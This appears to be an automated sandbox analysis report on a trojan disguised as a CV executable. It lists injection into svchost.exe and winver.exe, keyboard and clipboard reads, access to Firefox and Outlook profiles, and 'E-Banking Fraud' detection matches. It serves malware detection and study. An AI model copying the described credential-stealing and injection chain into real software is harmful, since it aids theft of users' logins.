                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003D6B0C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D6D07
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003C2B37
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003EF7FF

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: This is a third-party compiled AutoIt script.0_2_00383D19
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_63e21c6a-c
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ;SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fd29418b-e
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_182799a4-4
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ca040193-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C9F3 NtClose,1_2_0042C9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AA5D NtResumeThread,1_2_0040AA5D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B60 NtClose,LdrInitializeThunk,1_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A735C0 NtCreateMutant,LdrInitializeThunk,1_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74340 NtSetContextThread,1_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74650 NtSuspendThread,1_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BA0 NtEnumerateValueKey,1_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B80 NtQueryInformationFile,1_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BE0 NtQueryValueKey,1_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BF0 NtAllocateVirtualMemory,1_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AB0 NtWaitForSingleObject,1_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AF0 NtWriteFile,1_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AD0 NtReadFile,1_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FA0 NtQuerySection,1_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FB0 NtResumeThread,1_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F90 NtProtectVirtualMemory,1_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FE0 NtCreateFile,1_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F30 NtCreateSection,1_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F60 NtCreateProcessEx,1_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EA0 NtAdjustPrivilegesToken,1_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E80 NtReadVirtualMemory,1_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EE0 NtQueueApcThread,1_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E30 NtWriteVirtualMemory,1_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DB0 NtEnumerateKey,1_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DD0 NtDelayExecution,1_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D30 NtUnmapViewOfSection,1_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D00 NtSetInformationFile,1_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D10 NtMapViewOfSection,1_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CA0 NtQueryInformationToken,1_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CF0 NtOpenProcess,1_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CC0 NtQueryVirtualMemory,1_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C00 NtQueryInformationProcess,1_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C60 NtCreateKey,1_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C70 NtFreeVirtualMemory,1_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73090 NtSetValueKey,1_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73010 NtOpenDirectoryObject,1_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A739B0 NtGetContextThread,1_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D10 NtOpenProcessToken,1_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D70 NtOpenThread,1_2_03A73D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05024650 NtSuspendThread,LdrInitializeThunk,6_2_05024650
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05024340 NtSetContextThread,LdrInitializeThunk,6_2_05024340
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022D10 NtMapViewOfSection,LdrInitializeThunk,6_2_05022D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_05022D30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022DD0 NtDelayExecution,LdrInitializeThunk,6_2_05022DD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_05022DF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022C60 NtCreateKey,LdrInitializeThunk,6_2_05022C60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_05022C70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_05022CA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022F30 NtCreateSection,LdrInitializeThunk,6_2_05022F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022FB0 NtResumeThread,LdrInitializeThunk,6_2_05022FB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022FE0 NtCreateFile,LdrInitializeThunk,6_2_05022FE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_05022E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022EE0 NtQueueApcThread,LdrInitializeThunk,6_2_05022EE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022B60 NtClose,LdrInitializeThunk,6_2_05022B60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_05022BA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022BE0 NtQueryValueKey,LdrInitializeThunk,6_2_05022BE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05022BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022AD0 NtReadFile,LdrInitializeThunk,6_2_05022AD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022AF0 NtWriteFile,LdrInitializeThunk,6_2_05022AF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050235C0 NtCreateMutant,LdrInitializeThunk,6_2_050235C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050239B0 NtGetContextThread,LdrInitializeThunk,6_2_050239B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022D00 NtSetInformationFile,6_2_05022D00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022DB0 NtEnumerateKey,6_2_05022DB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022C00 NtQueryInformationProcess,6_2_05022C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022CC0 NtQueryVirtualMemory,6_2_05022CC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022CF0 NtOpenProcess,6_2_05022CF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022F60 NtCreateProcessEx,6_2_05022F60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022F90 NtProtectVirtualMemory,6_2_05022F90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022FA0 NtQuerySection,6_2_05022FA0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05022E30 NtWriteVirtualMemory,6_2_05022E30
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05022EA0 NtAdjustPrivilegesToken,6_2_05022EA0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05022B80 NtQueryInformationFile,6_2_05022B80
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05022AB0 NtWaitForSingleObject,6_2_05022AB0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05023010 NtOpenDirectoryObject,6_2_05023010
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05023090 NtSetValueKey,6_2_05023090
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05023D10 NtOpenProcessToken,6_2_05023D10
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_05023D70 NtOpenThread,6_2_05023D70
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_03029310 NtCreateFile,6_2_03029310
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_03029780 NtAllocateVirtualMemory,6_2_03029780
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_03029610 NtClose,6_2_03029610
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_03029570 NtDeleteFile,6_2_03029570
                Source: C:\Windows\SysWOW64\winver.exe Code function: 6_2_03029480 NtReadFile,6_2_03029480
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003C6606: CreateFileW,DeviceIoControl,CloseHandle,0_2_003C6606
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003BACC5
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003C79D3
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1699591068.0000000004233000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700637878.00000000043DD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@19/12
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003CCE7A GetLastError,FormatMessageW,0_2_003CCE7A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003BAB84 AdjustTokenPrivileges,CloseHandle,0_2_003BAB84
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003BB134
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003CE1FD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_003C6532
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_003DC18C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_0038406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0038406B
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe File created: C:\Users\user\AppData\Local\Temp\autE216.tmp
                Source: CV Lic H&S Olivetti Renzo.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: winver.exe, 00000006.00000003.2222067639.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2222314858.00000000032E6000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4144237864.00000000032E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: CV Lic H&S Olivetti Renzo.exe ReversingLabs: Detection: 71%
                Source: CV Lic H&S Olivetti Renzo.exe Virustotal: Detection: 73%
                Source: unknown Process created: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic file information: File size 1207808 > 1048576
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DIRZUznVUfWlad.exe, 00000005.00000000.1954793647.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4144891699.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
